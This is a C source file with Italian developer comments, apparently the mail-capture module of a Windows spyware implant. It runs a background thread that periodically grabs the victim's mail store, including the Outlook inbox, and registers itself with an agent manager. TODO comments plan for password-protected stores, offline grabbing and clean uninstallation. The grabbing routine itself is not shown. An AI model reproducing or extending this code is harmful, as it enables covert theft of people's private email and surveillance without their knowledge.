// XXX Controllo gli XXX anche in mailcap.cpp

// XXX Verifico che non ci siano leak quando grabba le mail

// XXX FACCIO TEST CON STORAGE DI MAIL "PROTETTI DA PASSWORD"

// XXX Verifico che usando i file di "Salvataggio stato" degli agenti non
// ci siano problemi di cancellazione quando si disinstalla

// XXX Provo a prendere la INBOX con e senza outlook aperto

// XXX Provo a fare grabbing quando e' scollegato dalla rete

// XXX La funzione deve tornare la data dell'ultima mail letta con SUCCESSO 
// (questa andra' nello state e servira' come last_min_date per le ricerche successive)

// XXX Nello state devo avere una copia della configurazione (per intero, compresa la data), 
// per vedere quando cambia.

// XXX Ogni mail va in un file differente


typedef struct {
	DWORD poll_delay;
} mail_conf_struct;

#define MAILCAPTURE_INTERVAL 30 // In secondi

DWORD mail_capture_interval = MAILCAPTURE_INTERVAL;

BOOL bPM_MailCapStarted = FALSE; // Flag che indica se il monitor e' attivo o meno
BOOL bPM_mccp = FALSE; // Semaforo per l'uscita del thread
HANDLE hMailCapThread = NULL;

extern void GrabMailStore();

DWORD WINAPI CaptureMailCapThread(DWORD dummy)
{
	DWORD i;

	LOOP {
		// XXX Qui dovrebbe ridefinire i parametri
		// delle mail "interessanti" ad ogni loop
		GrabMailStore();

		// Ogni mezzo secondo fa il controllo
		// se terminare il thread.
		for (i=0; i<mail_capture_interval*2; i++) {
			CANCELLATION_POINT(bPM_mccp);
			Sleep(500); // Mezzo secondo
		}
	}
}


DWORD __stdcall PM_MailCapStartStop(BOOL bStartFlag)
{
	DWORD dummy;

	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_MailCapStarted == bStartFlag)
		return 0;

	bPM_MailCapStarted = bStartFlag;

	if (bStartFlag) {
		// Crea il thread che esegue il grab 
		hMailCapThread = HM_SafeCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CaptureMailCapThread, NULL, 0, &dummy);
	} else {
		// All'inizio non si stoppa perche' l'agent e' gia' nella condizione
		// stoppata (bPM_MailCapStarted = bStartFlag = FALSE)
		QUERY_CANCELLATION(hMailCapThread, bPM_mccp);
	}

	return 1;
}


DWORD __stdcall PM_MailCapInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	mail_conf_struct *mailc_conf;

	// Setta il capture interval della MailCap
	if (conf_ptr) {
		mailc_conf = (mail_conf_struct *)conf_ptr;
		mail_capture_interval = mailc_conf->poll_delay;
	} else {
		mail_capture_interval = MAILCAPTURE_INTERVAL;
	}
	PM_MailCapStartStop(bStartFlag);
	return 1;
}


void PM_MailCapRegister()
{
	// Non ha nessuna funzione di Dispatch
	AM_MonitorRegister(PM_MAILCAPAGENT, NULL, (BYTE *)PM_MailCapStartStop, (BYTE *)PM_MailCapInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_MailCapInit(NULL, FALSE);
}